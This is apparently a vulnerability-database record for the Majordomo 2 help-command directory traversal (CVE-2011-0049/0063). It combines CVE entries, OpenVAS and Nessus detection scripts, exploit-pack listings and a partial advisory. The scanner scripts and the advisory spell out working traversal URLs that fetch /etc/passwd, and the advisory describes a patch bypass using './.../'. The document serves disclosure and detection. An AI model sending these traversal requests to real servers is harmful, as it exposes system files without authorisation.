Description
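File disclosure vulnerability in Majordomo 2 help command: the command's 'extra' argument is not sanitized against directory traversal sequences (CWE-22), so a remote, unauthenticated user can read arbitrary files through the web interface (mj_wwwusr) or the e-mail interface. The records below track it as CVE-2011-0049 and CVE-2011-0063 (an incomplete fix for the former) and give Majordomo 2 build 20110204 or later as the fixed version.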
Vulnerability Type: File Disclosure
Related
{"id": "E-140", "type": "dsquare", "bulletinFamily": "exploit", "title": "Majordomo 2 File Disclosure", "description": "File disclosure vulnerability in Majordomo 2 help command\n\nVulnerability Type: File Disclosure", "published": "2012-04-27T00:00:00", "modified": "2013-04-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "", "reporter": "Dsquare Security", "references": ["https://vulners.com/BID/BID:46127", "https://vulners.com/NID/NID:52000", "https://vulners.com/OSVDB/OSVDB:71087"], "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "immutableFields": [], "lastseen": "2021-07-28T14:33:45", "viewCount": 15, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:363726"]}, {"type": "cve", "idList": ["CVE-2011-0049", "CVE-2011-0063"]}, {"type": "d2", "idList": ["D2SEC_MAJORDOMO", "D2SEC_MAJORDOMO2"]}, {"type": "exploitdb", "idList": ["EDB-ID:16103"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:ADF3F1E022806BE8557129BCD419E365"]}, {"type": "nessus", "idList": ["MAJORDOMO2_DIR_TRAVERSAL.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-MAJORDOMO2-DIR-TRAVERSAL.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801838"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:98116", "PACKETSTORM:99093"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25607", "SECURITYVULNS:DOC:25895", "SECURITYVULNS:VULN:11397"]}, {"type": "seebug", "idList": ["SSV:70661"]}]}, 
"backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-0049", "CVE-2011-0063"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:ADF3F1E022806BE8557129BCD419E365"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/MAJORDOMO2_DIRECTORY_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801838"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11397"]}, {"type": "seebug", "idList": ["SSV:70661"]}]}, "exploitation": null, "vulnersScore": -0.3}, "sourceData": "For the exploit source code contact DSquare Security sales team.", "_state": {"dependencies": 1659906152, "score": 1659906570}, "_internal": {"score_hash": "83d2188d82c56354fa213352e7714362"}}
{"openvas": [{"lastseen": "2020-05-08T19:10:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0063", "CVE-2011-0049"], "description": "The host is running Majordomo2 and is prone to directory traversal\n vulnerability.", "modified": "2020-05-06T00:00:00", "published": "2011-02-07T00:00:00", "id": "OPENVAS:1361412562310801838", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801838", "type": "openvas", "title": "Majordomo2 Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Majordomo2 Directory Traversal Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801838\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-02-07 15:21:16 +0100 (Mon, 07 Feb 2011)\");\n script_bugtraq_id(46127);\n script_cve_id(\"CVE-2011-0049\", \"CVE-2011-0063\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Majordomo2 Directory Traversal Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://sitewat.ch/en/Advisory/View/1\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/16103/\");\n script_xref(name:\"URL\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=628064\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to obtain sensitive information\n that could aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Majordomo2 Build 20110203 and prior.\");\n\n script_tag(name:\"insight\", value:\"The flaw is caused by improper validation of user-supplied input via the\n 'help' parameter in 'mj_wwwusr', which 
allows attacker to read arbitrary\n files via directory traversal attacks.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Majordomo2 Build 20110204 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running Majordomo2 and is prone to directory traversal\n vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nfiles = traversal_files();\n\nforeach dir( make_list_unique( \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n res = http_get_cache( item:dir + \"/mj_wwwusr\", port:port );\n\n if( '>Majordomo' >< res ) {\n\n foreach file( keys( files ) ) {\n\n url = dir + \"/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../\" +\n \"../../../../../../\" + files[file];\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T11:29:21", "description": "The _list_file_get function in lib/Majordomo.pm in Majordomo 2 20110203 and earlier allows remote attackers to conduct directory traversal attacks and read arbitrary files via a ./.../ sequence in the \"extra\" parameter to the help command, which causes the regular expression to produce .. (dot dot) sequences. 
NOTE: this vulnerability is due to an incomplete fix for CVE-2011-0049.", "cvss3": {}, "published": "2011-03-15T17:55:00", "type": "cve", "title": "CVE-2011-0063", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "modified": "2018-10-10T20:09:00", "cpe": ["cpe:/a:mj2:majordomo_2:20110113", "cpe:/a:mj2:majordomo_2:20110124", "cpe:/a:mj2:majordomo_2:20110109", "cpe:/a:mj2:majordomo_2:20110107", "cpe:/a:mj2:majordomo_2:20110125", "cpe:/a:mj2:majordomo_2:20110118", "cpe:/a:mj2:majordomo_2:20110123", "cpe:/a:mj2:majordomo_2:20110106", "cpe:/a:mj2:majordomo_2:20110127", "cpe:/a:mj2:majordomo_2:20110114", "cpe:/a:mj2:majordomo_2:20110115", "cpe:/a:mj2:majordomo_2:20110131", "cpe:/a:mj2:majordomo_2:20110112", "cpe:/a:mj2:majordomo_2:20110121", "cpe:/a:mj2:majordomo_2:20110104", "cpe:/a:mj2:majordomo_2:20110102", "cpe:/a:mj2:majordomo_2:20110129", "cpe:/a:mj2:majordomo_2:20110120", "cpe:/a:mj2:majordomo_2:20110201", "cpe:/a:mj2:majordomo_2:20110202", "cpe:/a:mj2:majordomo_2:20110126", "cpe:/a:mj2:majordomo_2:20110105", "cpe:/a:mj2:majordomo_2:20110122", "cpe:/a:mj2:majordomo_2:20110111", "cpe:/a:mj2:majordomo_2:20110101", "cpe:/a:mj2:majordomo_2:20110130", "cpe:/a:mj2:majordomo_2:20110103", "cpe:/a:mj2:majordomo_2:20110110", "cpe:/a:mj2:majordomo_2:20110203", "cpe:/a:mj2:majordomo_2:20110116", "cpe:/a:mj2:majordomo_2:20110119", "cpe:/a:mj2:majordomo_2:20110117", "cpe:/a:mj2:majordomo_2:20110108", "cpe:/a:mj2:majordomo_2:20110128"], "id": "CVE-2011-0063", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0063", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mj2:majordomo_2:20110111:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110102:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110118:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110113:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110125:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110130:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110131:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110201:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110203:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110109:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110101:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110119:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110103:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110112:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110121:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110110:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110126:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110123:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110108:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110128:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110127:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110120:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110104:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110117:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110116:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110124:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110107:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110106:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110129:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110122:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110115:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110114:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110105:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110202:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:06", "description": "Directory traversal vulnerability in 
the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.", "cvss3": {}, "published": "2011-02-04T01:00:00", "type": "cve", "title": "CVE-2011-0049", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049"], "modified": "2018-10-10T20:09:00", "cpe": ["cpe:/a:mj2:majordomo_2:20110113", "cpe:/a:mj2:majordomo_2:20110124", "cpe:/a:mj2:majordomo_2:20110109", "cpe:/a:mj2:majordomo_2:20110107", "cpe:/a:mj2:majordomo_2:20110125", "cpe:/a:mj2:majordomo_2:20110118", "cpe:/a:mj2:majordomo_2:20110123", "cpe:/a:mj2:majordomo_2:20110106", "cpe:/a:mj2:majordomo_2:20110127", "cpe:/a:mj2:majordomo_2:20110114", "cpe:/a:mj2:majordomo_2:20110115", "cpe:/a:mj2:majordomo_2:20110112", "cpe:/a:mj2:majordomo_2:20110121", "cpe:/a:mj2:majordomo_2:20110104", "cpe:/a:mj2:majordomo_2:20110102", "cpe:/a:mj2:majordomo_2:20110129", "cpe:/a:mj2:majordomo_2:20110120", "cpe:/a:mj2:majordomo_2:20110126", "cpe:/a:mj2:majordomo_2:20110105", "cpe:/a:mj2:majordomo_2:20110122", "cpe:/a:mj2:majordomo_2:20110101", "cpe:/a:mj2:majordomo_2:20110130", "cpe:/a:mj2:majordomo_2:20110111", "cpe:/a:mj2:majordomo_2:20110103", "cpe:/a:mj2:majordomo_2:20110110", "cpe:/a:mj2:majordomo_2:20110116", "cpe:/a:mj2:majordomo_2:20110119", "cpe:/a:mj2:majordomo_2:20110117", "cpe:/a:mj2:majordomo_2:20110108", "cpe:/a:mj2:majordomo_2:20110128"], 
"id": "CVE-2011-0049", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0049", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mj2:majordomo_2:20110111:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110102:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110113:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110118:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110125:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110130:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110109:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110101:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110119:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110121:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110112:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110103:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110110:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110126:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110123:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110108:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110128:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110127:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110120:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110104:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110117:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110116:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110124:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110107:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110106:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110129:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110115:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110122:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110114:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110105:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-08-19T13:01:44", "description": "The version of Majordomo 2 on the remote host fails to sanitize input to the 'extra' parameter of the 'mj_wwwusr' script before using it to return the contents of a file.\n\nAn attacker can leverage 
this issue using a directory traversal sequence to view arbitrary files on the affected host within the context of the web server. Information harvested may aid in launching further attacks.\n\nNote that this issue is also reportedly exploitable through Majordomo's email interface, although Nessus has not checked for that.", "cvss3": {"score": null, "vector": null}, "published": "2011-02-16T00:00:00", "type": "nessus", "title": "Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "modified": "2021-01-19T00:00:00", "cpe": [], "id": "MAJORDOMO2_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/52000", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52000);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-0049\", \"CVE-2011-0063\");\n script_bugtraq_id(46127);\n script_xref(name:\"CERT\", value:\"363726\");\n script_xref(name:\"EDB-ID\", value:\"16103\");\n script_xref(name:\"Secunia\", value:\"43125\");\n script_xref(name:\"Secunia\", value:\"43631\");\n\n script_name(english:\"Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to grab /etc/passwd.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server hosts a web application that contains a\ndirectory traversal vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Majordomo 2 on the remote host fails to sanitize input\nto the 'extra' parameter of the 'mj_wwwusr' script before using it to\nreturn the contents of a file.\n\nAn attacker can leverage this issue using a directory traversal\nsequence to view arbitrary files on the 
affected host within the\ncontext of the web server. Information harvested may aid in launching\nfurther attacks.\n\nNote that this issue is also reportedly exploitable through\nMajordomo's email interface, although Nessus has not checked for\nthat.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Majordomo 2 build 20110204 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Majordomo 2 File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n # http://web.archive.org/web/20110726024342/https://sitewat.ch/en/Advisory/View/1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1456bb52\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://attrition.org/pipermail/vim/2011-February/002502.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/2011/Mar/93\"\n );\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"majordomo_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/majordomo\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\n# Check that Majordomo is installed on this port.\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(appname:\"majordomo\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Try and exploit the path traversal.\nexploited = FALSE;\ndotdot = \"./../././../././../././../././../././../././../././../././../././../././../.\";\nurl = \"/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=\" + dotdot + \"/etc/passwd\";\n\n# Make the GET request for /etc/passwd.\nres = http_send_recv3(\n item : dir + url,\n method : \"GET\",\n port : port,\n exit_on_fail : TRUE\n);\n\n# Check if we got /etc/passwd.\nif (!egrep(string:res[2], pattern:\"root:.*:0:[01]:\"))\n exit(0, \"The Majordomo install at \"+build_url(port:port, qs:dir+'/mj_wwwusr')+\" is not affected.\");\n\nif (report_verbosity > 0)\n{\n trailer = \"\";\n if (report_verbosity > 1)\n {\n res[2] = data_protection::redact_etc_passwd(output:res[2]);\n bar = crap(data:\"-\", length:30);\n trailer +=\n 'Here are the contents of the /etc/passwd file :\\n\\n'+\n bar + \" snip \" + bar + '\\n';\n trailer += egrep(string:res[2], pattern:\"^([^:]*:){6}[^:]*$\");\n trailer +=\n bar + \" snip \" + bar + '\\n';\n }\n\n report = get_vuln_report(trailer:trailer, items:install[\"dir\"] + url, port:port);\n\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "d2": [{"lastseen": "2021-07-28T14:32:23", "description": "**Name**| d2sec_majordomo2 \n---|--- \n**CVE**| CVE-2011-0063 
\n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_majordomo2 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2011-03-15T17:55:00", "title": "DSquare Exploit Pack: D2SEC_MAJORDOMO2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0063"], "modified": "2011-03-15T17:55:00", "id": "D2SEC_MAJORDOMO2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_majordomo2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:32:23", "description": "**Name**| d2sec_majordomo \n---|--- \n**CVE**| CVE-2011-0049 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_majordomo \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2011-02-04T01:00:00", "title": "DSquare Exploit Pack: D2SEC_MAJORDOMO", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049"], "modified": "2011-02-04T01:00:00", "id": "D2SEC_MAJORDOMO", "href": 
"http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_majordomo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:07", "description": "", "cvss3": {}, "published": "2011-03-08T00:00:00", "type": "packetstorm", "title": "Majordomo2 Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-0063"], "modified": "2011-03-08T00:00:00", "id": "PACKETSTORM:99093", "href": "https://packetstormsecurity.com/files/99093/Majordomo2-Directory-Traversal.html", "sourceData": "`______________________________________________________________________ \n-------------------------- NSOADV-2011-003 --------------------------- \n \nMajordomo2 'help' Command Directory Traversal (Patch Bypass) \n______________________________________________________________________ \n______________________________________________________________________ \n \n111101111 \n11111 00110 00110001111 \n111111 01 01 1 11111011111111 \n11111 0 11 01 0 11 1 1 111011001 \n11111111101 1 11 0110111 1 1111101111 \n1001 0 1 10 11 0 10 11 1111111 1 111 111001 \n111111111 0 10 1111 0 11 11 111111111 1 1101 10 \n00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 \n10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 \n0111111110 0110 1110 1 0 11101111111111111011 11100 00 \n01111 0 10 1110 1 011111 1 111111111111111111111101 01 \n01110 0 10 111110 110 0 11101111111111111111101111101 \n111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 \n111110110 10 0111110 1 0 0 1111111111111111111111111 110 \n111 11111 1 1 111 1 10011 101111111111011111111 0 1100 \n111 10 110 101011110010 11111111111111111111111 11 0011100 \n11 10 001100 0001 111111111111111111 10 11 11110 \n11110 00100 00001 10 1 1111 101010001 11111111 \n11101 0 1011 10000 00100 11100 00001101 0 \n0110 111011011 0110 10001 101 11110 \n1011 1 10 101 000001 01 00 \n1010 1 11001 1 1 101 10 \n110101011 0 101 11110 \n110000011 \n111 
\n______________________________________________________________________ \n______________________________________________________________________ \n \nTitle: Majordomo2 'help' Command Directory Traversal \nSeverity: Medium \nAdvisory ID: NSOADV-2011-003 \nCVE: CVE-2011-0063 \nFound Date: 03.02.2011 \nDate Reported: 03.02.2011 \nRelease Date: 19.02.2011 \nAuthor: Nikolas Sotiriu \nMail: nso-research at sotiriu.de \nWebsite: http://sotiriu.de/ \nTwitter: http://twitter.com/nsoresearch \nAdvisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt \nVendor/Project: http://www.mj2.org/ \nAffected Products: majordomo2 <= 20110203 \nRemote Exploitable: Yes \nLocal Exploitable: No \nPatch Status: Vendor released a patch (See Solution) \nDiscovered by: Nikolas Sotiriu \nDisclosure Policy: http://sotiriu.de/policy.html \nThanks to: Thierry Zoller: For the permission to use his \nPolicy \n \n \n \nBackground: \n=========== \n \nMajordomo 2 is an upwardly-compatible rewrite of the popular majordomo \nmailing list manager software by Jason Tibbitts and Michael Yount. \n \n \n \nDescription: \n============ \n \nMajordomo2 <= 20110203 is affected by a Directory Traversal \nvulnerability because parameter 'extra' of the 'help' command in the \nfunction '_list_file_get()' is not properly sanitized. \n \nThe original bug was made public on 03.02.2011 by Michael Brooks \nof sitewat.ch: \n \nhttps://sitewat.ch/en/Advisory/View/1 \nhttps://bugzilla.mozilla.org/show_bug.cgi?id=628064 \n \nI discovered that the patch, which is in the CVS since version 20110125, \ndoesn't protect against the Directory Traversal bug. \n \nhttps://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 \n \nThe diff adds the regex '$file =~ s!/?\\.\\./?!!g;', which deletes \n'../' from $file. Bypassing this regex is quite simple by using './.../' \ninstead of '../'.
